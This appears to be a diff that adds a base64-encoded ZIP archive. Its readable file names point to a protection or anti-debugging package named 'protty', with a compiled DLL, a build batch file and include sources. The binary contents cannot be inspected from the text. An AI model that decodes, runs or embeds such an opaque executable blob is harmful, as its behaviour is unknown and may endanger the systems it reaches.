+qFKjzp7AFuJPu+60f4uIJz8YiCD5/4pvc3q3KC6xereoXeEbRVGofqMIWLhH
+tM0riHRBXtLay//Tk5l0Wehl/0wsGfGewLhNgXz68fIFb//9VRdCJsgYFQZG
+fNV28BSkINH0cj4tj8/O4LXkD80w9ARLJdPv7+fXbz7eQr5sHv4GMFCspYVe
+CFKgFdsX3N5Csu8MntSxyiq1DYPeMv1HhJ4yA2eLrjLpdY3s6Ln1aO/P8GGm
+hYy6MePsz0P4CSUBqiRW3nyxoW0k/s7s8BXBPb/zGYQ2cGVkIE+xUplfX9av
+r74jGPiz9md3QFvgh/MhpMZLtY2dt+j9ubjE6v05ZZ7EB3wNvA3ZilOu4EEQ
++xOG7cFgfEHDVQ3/Q2Qa+mOnhlGJtVNDYIg1+oQ0usXDaYDVapTfYNAtWniZ
+re6K9Freb8BzacMhftSbJLrJG8O2RBONeaJ13fzuSDTkiTpL4FiaaMoTLequ
+qzeBnMp86aqTyKkpVms9lZETKs54G5EmmvNEldFKLNFI5ITEZVHmbV42SbXK
+5URjkWhZ3OVIt69WUqkk0XQoF7febRaW4uZyY9ZlV2xbI9GIPY7OO53qkLTb
+N/tV3hmPtAN6u8Ev9ErJ8KdsisqW7NPISCiFz5QTjqWEnf5WuJxwwhK2gYRT
+KaHvUz7NpIRSv5gJL/SErq++NBI6vnrOEqZlnjToc/RRxhJeSTm2+tO4SoMP
+1ZT4SN+ecqSmzKvMlafcOVutlmrKqdqNarsrKWdSymq3UXNVUl5IKf1fdKmm
+9HyR2vBaiyopr1R5Wzb5b/aUY7nlt8kqV17oUVLKo8KfcizlWRaVJ+VEytOf
+UukjmETk952UlHIfoUWqqtDExdMqKeWhgfOU5y8l5aVeujPlXM5Tn8mUlFdy
+nr6Uk6HSm9u2yKTRrqQcqfMjHE+3xy+HwVfQ9UgunXW5whMsT2BZhSDBiCew
+rGWQYMwTWJYoSDCB+vFvWeyy7F5Pwr9FHr/+lPLsuquKtM6kkyNImabmb1Lu
+Tkb/jdV+D7K60xtRakOcIKtvKyMBbcM9jCBrDmMpgTUH+rV7LIdoripkp19I
+MJUToKk8vdZymLEEtnj3kIAODKvKghPQ8YBUg0wvgCSYY0F8xPvMwZfTw4/B
+EZyy3t8Oj3BgvEizPZs8mV7G/plqCEwTo/9MRzL7ZyxI/4nUx1R5Uwz/uiRq
+EPppU9/oP43YT0VVbChJfxqzn5I7/acJ/anK77rbokL9wn+a0p+2TX6j/TSj
+P+Fnr9VqXNCfbtq0qctS/umS/rQ2f5rz70KCv8mrnfjpiv50nd/TH9hPI9Ya
+SSMUBfoTa40mb7u6UX5irdEl7TWEAZN+Yq2BKpjnVZtAI9OfWGus6w7VRP7k
+0YxqbzhmVLWDh5yJox/ffXw7Hl2mdmZs+xdN9tX68IqRyhpWw0jVni23svRU
+P6wuIXqqp/b7Z7AWmynXtFt4ys/f3vCFcMPfeU1e1VFS7l4eLWn1lF9+FGiU
++WI9iJTQNLaUzK7BUj4+upwXpW9Xe5TF+pI72fxjOzqFpRKyaDs04vP0WnuR
+mD15PSJJdpVIxH4a0izq5R58QwwcNklr/PNtU3SG2gwz0ZrTShI2I5GfW7T/
+zeENkS31UFAzJz/nd2m5aws+QND0I/+c5dU9rQbbUBk/k48gP0/Mn6u64plP
+6c9bUA6NDxuxqmVIyVQ+HP88Zj+jbXGxvNd/nvIPQ6pnunb+nIKhstR/nvOf
+0ecYZY94q20b1J6d9vOY/5zf0YlI/nnKf25yMHBoP8/Jz1gmku0Wn0SA33GV
+JQ2TG7pxxmkyrCqgFV8d79r+kCaGGIn73/OmplHqpMTwh3faJCGfDfmfZNEg
+wxOSQro9OS1BSlRdd0p+6A8+h1aXpN01TV51uGKOtCOWtqzTpETLW7ouqtye
+dszSQn7GjklNO2Fpt3mD9SPU83vsXGimner1TetqWays+c5Y2uy+2ivOimba
+C76mVGjXmrf1rklzYdkfvJzAmfDx1VgGJKMdmetIUtuC4UiaHd/fnh/+UQhH
+UpsrojXp8xu+a64ZDcVFFCVpc/j2qhsYHUkhYoYej8aRFJ5rOmohl/SkSmOT
+2f7nn+R/gz9ZvuFPhminNflqnzdN7bqJzvr7l9HgP8nVhR9PYNN/I46Wx5c/
+BieU5vB+JnmRydCf12A4+M/qdfDXA7xIDnXESunx6/HwhWTSGvY+SyaoQruX
+4yOEL3r5/vz8y/lw+oZfgv4CwocqRj/ubosmGnuWPK+xmtdAyuv7y+Hvtwfs
+6XB4+et4eiVhheQiFkWVNI4bRryIyeA/l6cD2ge+nr4NPqPMT/8QWpFCFz0d
+/Odk/Mvn4xnVDyJ6DY4vgy/kDjL8y+F0fBx8pc51PFO0Beq6MoctQpFUEZn+
+MngHUX54H/A85OwWxUrPS85upmeHr+h/Gfw4np+QkPx1OMHDjZ//wXcaIVe0
+Q1O3LbZcLwb/SYKXoS+E0F2D//Gd9hTpApz96/cz7zP4t6RNi2Lw78Pp9T9I
+UZsd2tw75IoXdTn4zw1q0CM4zqmFvA/eD28PJywQn/+Rsh88PqF/foRXjQZI
+SGAksjoNzj9e7SlJldhA3JfaiipXaT74Txa5ZfB8fD9Dv5+fDqg56T9+e3hj
+02+3WOzQZpF1jpiBB0f6ICv+E34j5G9IknyBCeqBnNXbk3x9l7T0L9oVRJGE
++9bYk6BZW6i8uuzTurSkZ13V1b+UTX/aP5vTH0tAEkMo2tzQcbniAGs2S4R2
+lkgdsCQaS4mIkd6SaColWhdZJitIip7CEqE9LFIPG6SOE02N69xDKdFtkyi2
+A5ZoLCfKy7LYtuIqK0s0lRNtkkbR8lmiOdHIINk9mkbUxpWqzvKCRG2uGjSM
+5oREuM1ticZSolVTK9YZozl5TlJKlkjN5P89UNILPGvqrWzhMXoDEumWQdEb
+8odDd0D/m90hp0rKLmsScdgm+kNOtSwTQ8cmHSKn0ucNqV5ysnTXdvUmb5I2
+V5KNmcbdLYrlvtgkK23h1roOJeryO9dMRbsOJcIy5Ug0FYnuS1eiOUsknQeb
+38gSwQuQSWVsFMgX8uLMR++VkYDnDlRg0gQagQ5ybSiwRNLuBCXFsuYaNNL5
+FVgaYX4JJZ3gpGgC0Ys3k05xUn0asSadkaS0dGUO05NeKUmVidNogaGSVpk/
+jbQjJa0yQxppx0pa9QtpYp52ouW7WpdgE5dtFfIBFEoLJ1pO8ZWPi1DaVVTa
+OU6bZBm1E/nSXvG0uMKtZdclHxopaW/daS/mfLOcpubRg7SjGwzFdhWSVjWY
+b+99Scc0qW6ntiSd8FybXLcYa0mnPCmaAtBeNUEdV9mTzmnSJPsVTXRiBjaT
+4umA5JoVN4WIvmUmnbKkuoOCmXTOkuonNnJSnhXEeSF9QCD9kMYHkSaWe+Yu
+iqO9SEWg66r9smha5eRu+MsMSxT6rUxa9ZQU/Ta9Ir9VeZ7xNQB+E5n9Mhiq
+aW5taUY0UbuuVYFVEpE0W1lO9TRjofSKsSVuMH4mjn0Ulrz3eN+RVC+ShUk4
+k8qplAKEoin+jdtQpX8k422XWVv6Eo5x4TdLS19Oh+S3LC+7hJ2CE+s9/GXj
+/AkSqD4HimFsOCIJVs4EY54DP2ZXE0x4Do4EU54DPxVUE8x4Do4EFzyHJKXG
+SjXBJc/BkWAu6iBrNiLBlaiDNcEIN3Wr6NHM/PxEfmIfCJLBTM/0Jzwj0dFL
+f5rKP9HZgP40Zz/tupq1CLNGs5+apr69zu9b/tOY/SQ7QDEzM/0J3HnqXYsU
+oJb+RJX2ClwUitS5v+aZoYRYSH8ZY0gRWCc0/AUPDpReEWJP+qsrbFsFY22T
+J2VZp0g92W/LBG2A66q850Zg2iQ45SqvkN7aYSN+voVD1lZKhxscjVAiINJ2
+d/AVXk/BhYs9KNlaDv48sPAMX35oPz1++2L7iebPxj4TRz7u8T/AL8uboukk
+I7OiOi7TuuqaujR+BNFoq2wfdCRkdnjSv+UNIqoMn+yw2H2DwfNfX4/7r7JX
+qbzDHvIkb+//Fhnbkyhe8Y5cZGum8FkfDP7nv/6LJDp+3f/1J4liip1NtXzk
+j8iRCJN5E/0rnEUpn3XcH7/Jx42awydJUcgRmq0p2u+fRSJbinflHNKZgh99
+2lKgxu0O3EfWluLx8QlSbB7+dn/LN8lebUuh3lqw5/HyRVic1RSsjVmrlzf4
+fxKx/J/01/+ivZHW5W5TKf3xGOyPx/3Xb7J82FI8K77othShtnwMtuVjsNcf
+g62NUtQnySBvtCVtIdGa9B9Ee5J/oC3aFiVowZuEr2tD9s8t+kfhcDDi/8x3
+GngawB2m7MellQv/JO3npZUL/yTtqqWVC/8kbWiklQv91O6XdbqjWzi1LFgm
+yzwV2ypRVrtPd6r2w8tqse1lXZRFpx0wW8pG6mtTJvebpDXWM6Ib4UmR1AW+
+AH+8kZolxWnhiB23X4rae5Gk17dGWnh1xkxnFg/pCtLgPBHnb6piz3pUfBmp
+LvrJ1aroJ1erop9crYp+im1VqNaC++bgn0aiWou8ZAo6/mksfupqvtHBP03l
+n/h2Bv80pz8RX03UhniOgZ/g34im8WkwwtK8LCxySdoC/SS5qCttQaiukAYS
++0D0k6TZSRoV/qnKE3C4ubtXNCpSLbQg4blwYFZ1oqa5taSZ4zRFg7ZrO9DK
+eOn0n/ndQWmEo38ukwU7sxcjvKFCIGWldicua92hyeR2nTfCXYo1HfqprrBj
+B5SqNB3/SSrZkJWpmpQMrrQ2zn94q/Ok/Ce9EnUzMApX/42XQjPU5VQqS5dT
+ojvin3RhZJ2Pf1JFmHV+grZdy2RXqs4k9CeLVj+Sf6JmFaWNk31bJduuXjUF
+dyDBZ+togVjulxt9FI/YT7dFJru28gxT25w/ZT+1u4UsubyhUlTSXvtk+l34
+J62heDXQT2leddhOolUD/QTmlmJpmZRp0glO2qa3eNcjDD5iapR/g02ZGRId
+p8V7/duimozxwCP+CEIZ+fH1CwlpeBAxUwmtL+SQ8usZx9mFdw2kC5z8Ye//
++V8iYfnwfk4e4ZRbJHUmvD0dlVfLLQnxzStwrYNHzvkn2irJU5Zy2ERbSvya
+Lo55OBzEphwFUj5C6calKRw20Xj4jhIJXC580Vz4MDESIbf0LmTa0hYtWe06
+Jy7tcs+Sv7f3N2s0KlL1f+kJzTt11oS2i5/WhFgDJRfJPIn4Ia23SPWivas4
+JZmzTvp9Q3vCry/Z8x9qyAJrQtsdaFeOLLxbIOFjc/hKgpAHP4a85SN9kj8h
+0udZWp5QEyKrbPF6kM33/1SZ/1LSk7nIJo1PsdL4FCuNT/gCs9ZWjoRxYvsU
+I2xPMcKGE6UPb2flsqg14Qu8j6tdZ7UnxOGRt3zLZS82KhGSi2Bxb09viu+X
+PVGcXD+BK/DtA/iaPJz+9LWZksye09uzkpOvSOUNPneRUjJzZDCRNsaGtu7q
+o4NyeHx0qW6bOT/qthlROv4bslQiPu8oKtXYk0q1C7hSqbYBVyp19++slzFD
+qqlYy7DW7VLZokJ//S9i4YJfYUfdpFjPdd84JcfcLC1Wlh0Xg6h+C2m7ZNFq
+vw3Zb/S0UPptxH9r0RarzEvimKpx2H+qlHxW6ZawY2dYVBvUOXwnlWmz0n4R
+c8lqlWeyDX0uONgX1xWprn4HB++bRBno17zJmuQWF2Zpm7FIq/hywG/ToVpm
+ld9wfXfOftuY5zijCf9tBYoeWkGwPwY+qErFdnBM0rRyGksVZWQiskUik6K9
+n5ntFAuY6pEhae/4N9mlQ1Lf8W9NV4JXO95US9sI/JvsdSHtI6Q62es9E58q
+bwDlJBdKkltrkhFJU1Rt3nRiDMlpLvUkt2Y2tOGJpz2tkJ5oLqdJyhLvPgO9
+c6W0BLnWqKfBx5wkEYRAEsdXSqIRbwxPIvwZ6g5f7Wh1d612tLbNVjpa3anT
+go2tup4HqfK66LqcCbJR5YnSyUhAm8RMNCWJyKk9vRxqCPlQyYlsIY1EtBmb
+HE65qcwbicQw3CYZEXszkRh4TX1Lxp2ZaMoTibnESCSGgifRhSwkePKxJLqU
+hcSVCMux/Vh/NiS/Xef3YholGahH9+h/IhmEO37izFhOM1LT8JlDToN36nty
+BQ8f7W1y1IbSVv1tfzReIJHPhP5FU311qM1qqven1x8pP7RzpXo7b44v29f3
+I1dhlaOq/xLJHv4OJzs9VuBm/SxSyregIZnx/Uwj0P+dnyBqP+CD0lu0S+7q
+7ab2HK8yS8rPP6VdU+7TPVq7DB8GNfmQpl2g2f/ak56aJkm+cHcykHZM05b1
+ql4u3Ykh7Yymbde7DmTSlRrSXmCJSmvoViFHf+sxTAf/6PFJCcKanvwvi0cw
+/gFSZLclxMFq8pbZ/9wtCGmzckUj/XnSTklafjHIlxaN4SwrzStv1jo8icT4
+8NyXeEQT657H1sRjmpjExQ8kntLEWQFjoHZdgWAKG00Nd9eKG+f3MZWNpt6i
+AYD6xR21UlLwcF0alLcvxqWk9EF66XqgO/2cnbqjcVPftrl26j74fDRCkCme
+7UOW6u345bl5feX7Fkeq93/Tm03ECmdP9axZgeypvj+rJghXXl+VUFCOVNoW
+yJ5K304pLv5DtQ3Z+JT+ic+K4t/whqnY5GQXNJ6u611jjUuN+wp3FDj9Nnm3
+ayoYH8sWiShzrOFVgYEB6dAQ6lY1PkrI6k1SVFq6MU0H5xJIWZF9oJV00ye5
+3GULHmdwp7vV0s1pOvKB8E31ZrvDZnY5Hd3hKCm3TSHZ49nfWE9ZVEio4f5k
+mbdKSir47XqVoR+xLVa63We0DsSGut/maIC310hJ0w1oNCXOEafD1ZPCnJg5
+0vzym0L2xjPbm6QrtpY4PTzdhNRwXcyGqNG1idAsmaRb7kojZotaMkmX5VsQ
+zlp3RIY/tcjX00DKm2cAbkFtK05HemewzZtW3i1qsiGqqs/VmmiQiatjTjWS
+m9T5r+Nes9wYjj4k1ZPiWuNKpTrPeFOJ2AGOVJqBx5FKM/B8kU5LpFTajORK
+1R6eD4/nwxeS2pHqMX06Pn85HV68eWkzpZaKd0b+8oXYiuj/Fr6k5B94z+GN
+Ln3XVevBl/2TbDm2zMk0VfHyfjidk68QOdKZ6ij3M6sW/sOqrV6XnDnEav+u
+fIj0A0lbiGvVA+aWgf6Y2Qj9Lu9k5N9H9HfZ61D+fUx/b+vG+juZMjq370zn
+9p3p3L4zndt3Bv8kgi4rdj1MUS8Px/0bZtaDpEhtKrMmr/hP9OrKpig2tls3
++h/V6XHyiOeAqFpPct8teEgTS7IpTYavhMBtMr+6NqfJYY6PqARuLAz4H98R
+teaAJ7Qh0QNZQsvtDKXGPOEyXGlqnnwill7syFrVqKObIinBhMFMpFTkiKcr
+Wrfx3QXpx3G0G+z/H1BLAwQKAAAAAAC7WMEyAAAAAAAAAAAAAAAAFgAAAFBS
+T1RULVBBQ0svcHJvdHR5LW9sZC9QSwMECgAAAAAARYrBMgAAAAAAAAAAAAAA
+ABoAAABQUk9UVC1QQUNLL3Byb3R0eS1vbGQvYmluL1BLAwQUAAAACAC5icEy
+IhRYrrgNAAAAMAAAJQAAAFBST1RULVBBQ0svcHJvdHR5LW9sZC9iaW4vcHJv
+dHR5Mi5ETEztGgtwU1X2tknbtBTSroAV6/JgiwNUSj5tqhYkpS1QKZC2KW0Z
+pXltXvtS26QmLyssKu2mQcOz6KDg7KjLKOCngDp+Cy5rS2b46DgLqDsouoI7
+uq/UH1QMv/L2nPvSn3QUmB2cncmZ5r57zz3/e979vS5aZiHRhBA10RJZJqSD
+KGAmE8ivQhQhu5LImIlvxH8wqSOq6INJjz1m5R0epsntqnOzjUyj1yMw1Rzj
+9joZr9POuZlyh9NoGJ2Qlv3rwq8NWAoIKYqKIV2GnYF+3DGy7tlRUdE3kFRo
+aMLIpPBPhw2zUo+mIaCgIglKpYlgMClED9OUpPCExRALIQvDor7+JQNthIyN
++iWCq4O8JfkFtMKEDUJfY4fTQNex/FxrLm30+45OTR5OZyakM8NhZwU2TGcO
+06WNQMcNobOE6W6+hM6c4eYaXDVhOluYbuoldJbL8zYCEYjASGCT4qFkO3CK
+2ZNIbD01lpIlVmslM7VmGlO9krE4XIKbmcs6HSwzqxofGU2IMtc1so6GjBpX
+4x2jE3hBaLp95sym6gxPE1fjYBscHs6e4XDWukYnFHoYp+s+psHF2h3OuoyM
+jNEJRMpAncF6InVdxiqj2Nk8e9TvzCRK27oVWtK/VFB8NpYQvjXJTKTRgFtY
+ULK4oMhoyMgvKiLSn0CwNAbQ8zmhdKVH4BoLwRxikcqgQz747GPAlh7zCJTG
+w+Loh+EZOikeEYPS4yA5dFxFu+rNPM4//H9ugJlGMgKnv1M4+mT53+9ONivY
+yt4tFfLBdwfbxs7e9r0x1FQ2aJPQ9Ltbvq2BfkkL5oj+2VPNxNx8633ecz5J
+JZKAPw5o8amCZz2RN9wGBNKYZDD/BdBtr3tWR0RzotiUKs7TSE8ASrKCUOPR
+vB2iRSP+4D8sjPedj34gOc8i7pEE7M+E/oqeY1IeNsZDY/p0ptSaW2ItXDyf
+CQ/v9OmgigVVbHAwxmLFLNUR36r7ibb1JUgIcdWKDao+iM+SFP8BbetGQHXg
+0hY6Tv1a3vJdDtgcWPP+dWaytNxSr6bRsoATGxeB5Mqq5b4zROt/GQcsHIgG
+YJDSoV7gdrvctzN5rNPpEhi2ASZ7VuCYRq7R5V7J1LrcDLeiyeUWPJPCdtYn
+STj9Y1peRk5esRKMfC6o6a7rk+XAmn3gkniwvFi8L1V1eql4pnfL8soqW/nS
+YnHvLgyB9BQUlVXF5TjeFZW7cHWSHoKiinaL+3ydqTspoRtTPefj++NL0j8O
+lKcu64kvSz8R+jzgSr3bRtmG0M4bEqmNaIGf2tGGAZbcOCIUsQtf1jD2OhQ/
+ZAwHXuuwmM+RKLwfIeKRkmKLvKEA/KQjs3GIvtixQDhxMGhLHW7ByzZY3C6B
+qxGmTmNqIbac/SpH4zIED4zAV+dlmQ1Kr0Hmbt4CVlHnikssWr04GtuqrkNd
+LV21sFkJ0HY9U3lI8sRkMb6Ob788XWk8HDq5flTnsspLgnI1MBDIm8dB0Han
+Qslo170DOGMnjeGrQ2J4J/RKtwy6utjbWA2bXlct7ojRW87OuLk6h8sJiVfD
+wRyZkXGVAb1SLQPRfeicLLft/gzjSL0JxAWWqH1+rGqGzFjjxptJmOyMGBfI
+T0sR56vhMXYw12y8EYjq1fWEH309zl0wn48bB4OWPT6cX+1DYlMLSGka+flL
+6RFYt8AIPMfUeVm33cE6oeHmWPvVvvdXpGIgKveexZwzdkrnL8qy/4AwziZ2
+ie/RF0169QL0+To1PV/KWeialAbrjg1o/3EpbesALcQSSLYPIzEjCTuE5H+R
+oRGIQAQiEIEIROD/Cwa2W60TYbvlfxC2URbpsIYQeorYGUNwy1+MB8L0H2VZ
+3I3VNv+XQCxdD327mJ9RxfyI2xjb3rju9H0+KSYwHw6hYlGaWkxNa8kBuk6t
+Pwv2KdJJNR5ltf6p2KjAYhz0StOxmB1DdzcDpk1kzGSff+JkM5EBpK1R9BSc
+5tuNqCjvjdLYEKDXATqMElRsz43S0Z/AlO596OTg3ofrBWS/4BUg2CaWJpb0
+O74iHhx5T7XfVix27YxD/yiTDpiWt+2+dZKZUGzvFrbN/wUwi2cDbXMAK40C
+w1i2nhRT0RUzPoRO+bFKiMjTA258jQy7kbztzSGibKIfcQH/lH4cDar0zilw
+6nr0gX2GRxFBWvrUaXE/37UNqCgEER3MD32r5TfLQPejZMh+muvvE0mOH3uF
+WFbC498QmgD68jL4IiqXAm14JRDQSK+fBlvwfnY6HOQXFhYV4TneuqAAz/J5
+BaWlcJjvP83jhpZTTvUDYo+hz3QALfXR9TGyJ0U5AsJuPhVGcsLA8VB+E4mG
+UCgbVFv/HcROSy5E5gREhtaUHe/6kzTl+pUtAgn0GkF8vBkwqoOi2ApP2APP
+silJTc/HwRjslcqAWd5QCKq0+wM+RNEj8TAaPSoYouGVyThcy9NAzxGVeZbY
+QfWcF7NVvWKsKujrjDYenuublUS8Z317DOIRX090eUn4bqIE44N3E8uq6AHl
+NTJ4QIn7A0R/BrmcW4PCXCvjZBu5q76cuGI1AweV/d/IcsBfDd4HNtRCWS6+
+J54Re3u3VNnEoPier9tQrFxQnPteliuLxfN4QVEpBpUbiq8AyZZbxH00wgrh
+IcBVVIltGNGcrvs1lvSuQFxFj6Y4fX/ok4C2snzIkOyTNgN1lUgNENvQAOnT
+HzBhBxFKWqxCTcPeFNs+yDesiEekHEInkSlrVRJ+cxDtaZqeCcbDdtlgD0x+
+WAW1R6OXIX0UfUMG28jf851tBK615Ne5wiN9Mg1fiHoob8tLvH9sTAugobY6
+YZC3nwvyDrIfdJnVUg7kKhgN7+2dF2jOi3mJ0s0KMh7qrGS4MOxdqJyCVzj4
+KgOFTkzxHxWmi0HpDoVlIlSli/0iQ+dluSVnqSikeU81r1JrvN+goEvvNZ/D
+KRrR4WuUXMwbmDsfBPxmzGwJv0MttgKxwnAvMuAt60JHmYdzF6yo4ZoEh8uZ
+7/A0sUINz7mB24zcuIJsTp90qYgMFJECuBKhocApcO48t0Nw1LANpVwNigIB
+MqTH5rIR1J+CDmkU4oQ8l1NwOL0ckB9EcpyfR/CwUx2+uS30zGXt5aCKswho
+5FPIdPfITCIy4V3YEq/Q5BXyuWpvXangdjjrcoGTRU52ZM5idTig8znB6qi5
+J8/ldQrAMwN5CkfmuQl5tIODEL7LAq6QCrhw6qQ+l5UWlPTzdOONdSIgF3Ee
+D1vHzXWtQNP2IkPuyGre6mcpWOEQQEcNcAIL3lBv5kZm8SELZm4pJ5Q5edZp
+b+DsA2M+z9Eg0PG2oIjZI4swo4hkJSCLXHZvA7eAikFrU5DvtuG3xpcJ+3EK
+EB/QXJBwv8Ie2KMmxk6LxcKT9nbCT/xU1vIvvn1W5uXVp018e7ssQ9HezpPm
+9nYLhfoyvqxvdRJf//Z9ZXy+9atWXp6fn8+vubjtIj9j0z3P82U7uHN8cllZ
+Gd+enJzMm7ZN2Mqva/+kgZe3tdfzp3b0yTzgD2GRzG949PkJ/Ber1jyiqKFF
+35KXtvEnLr7wET/NK5fyF1/YIvN3ntq0npenda/eiV8gjUdpkm378kxw1FFv
+XMXyZUstrzMLD50ISjAvy1rfczj3HYeqJ7YDPx0HpY+g4XZKHyCOlfbiwyq9
+i8gZUodCiAtYUNqmNBja+KvSwFAFO1QUJSooDZX6oNLQ0X5NNJa4vgU7kiht
+FXZfJ1UoVFGUKklDaWn/HNQfi+rlIP3iH1SGx5t4wXjU2LldXKQZldoy6ydB
+PSvkTW55H135KfZWbyxUYSKYpfVqtotPt+CHbt952RsfuCsttfsHEBEKojIh
+xtcb1fN2KIg2CQm+Xs2LUV6VrzcFMCBJqNi+Vlq7v7bleFxnc1+nUBgK4uoi
+pNT6zsYKCc19ZuGm5r5mrwa0gWs905rPqr2xa8fMaz4eB50UD2p6koFIiAWm
+GGqYGtVjLIWxLb3IqIiFvl78sh0Kou/CGF8vEwrikoYW2cAiECVEbYcKIIXo
+2h1QUyMKKhhN2oejovSZKWpHujcxIKSlQh5riDxlgRk2nFOKaGmhpZWWFbS8
+i5Y2s/lK35lrANYFhaUM/OF3fqa0IM9auGTxb21TBK4dwFw+ADzUF5hHpvsj
+4FvhtxF+z8PvLfjthd8/zZfXP7DG2BsaCLl32JKWHAVLDTZy7XY3IsjcqGGr
+MXkkqsjF2osc1W7WvRKOHvOiS72eJs5pt9KLfGKPHrYdIotIHuAFLtwdgcsC
+g0X5f6b+31Ro3wI/Hfy0MBXeQf/bBj8yCSuVzQL9qlylfFL+TU2PwNUCjGsz
+PLbpTPp5+qX6e/V/1q/Vr9f36fMN5YathkTj9cZNxi7dGd1FXaz+Bn2t/g6D
+y/AX4zFjfOZW46vGd4w/Go2Z6zJfyXw3c1PmtKyZWYuyQll9WRpTiun3ptkm
+q8lhmpndmvVN1jzTM6bo7IfmtM3ZPOflOW/MOTCH6mcIeQIek3WrdGt0H+u6
+dVN1ObrFunZdh65Td1T3ve60TqWP15frvfr39R/qu/Uh/RjDDYZWQ4eh1zDX
+uM34lvFvxiI9r39E/6T+Gf2/9RbDa4YE44+Z5zITMrMzZ2cuyFyceVdWdVaS
+6YOsUaYi0yrTq6YTpt9nW7P92R3Z57ONt87LKcopyanIWZ5jz6nP+Q3HIgIR
+iEAEIhCBawT/BVBLAwQUAAAACAB7isEyc12f0oIAAACfAAAAJAAAAFBST1RU
+LVBBQ0svcHJvdHR5LW9sZC9iaW4vUkVBRE1FLlRYVEXO3QqCMAAF4GsHe4dz
+WWBCvoHkJGFDcA3qapgOGlgbcxB7+/6Qrr9zDocSSgD44GJMZVFzDuwwuru3
+s5kw22sYQsJmMaN7TIjJm23+96eNN0qyDJBVw7RgousvWnQ1w2IiosM+h2KN
+PjLVt/LUHuQvviqG96qozp+O4kyuUBbfXy9QSwMECgAAAAAAAj/CMgAAAAAA
+AAAAAAAAAB0AAABQUk9UVC1QQUNLL3Byb3R0eS1vbGQvc291cmNlL1BLAwQU
+AAAACAAMP8IycLYCUGgAAACVAAAAKAAAAFBST1RULVBBQ0svcHJvdHR5LW9s
+ZC9zb3VyY2UvY29tcGlsZS5iYXRLSc1RKCjKLympNNJLycnh5UpBEshPyuLl
+KkkszjU2UtDPNQRiYyCugMob6uhYA6VzMvOygfK6IQUpCrqJiXBJuKLM3IL8
+ohJjI72czCSYqF5KapoOL1eAa3hQsKuznrO/rwJcJicHAFBLAwQUAAAACAAu
+WnkyLwFFIKEFAAA3FAAAKwAAAFBST1RULVBBQ0svcHJvdHR5LW9sZC9zb3Vy
+Y2UvZGVidWdfcHJvdC5pbmOtl1uPm0YUgJ+x5P8wUl/aStmw3pvTRE0xjHdp
+WKCAnd28IAzYRmJtAmzi9Nd3LgyXmbGtSMWybHG+c+bc5jC8B67nBMEzMG3d
+WhgQzE0Lgjc/dY1H739O4ZgV5gv6+RvqAXgD4jKN6jQBqx/AzfZ1CWbRLovA
+hxX+uSjwrb82L1GWX8T7lz+xiW1dF3+8fVusLqoijbMoz6o0uch26/3/5Sb+
+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
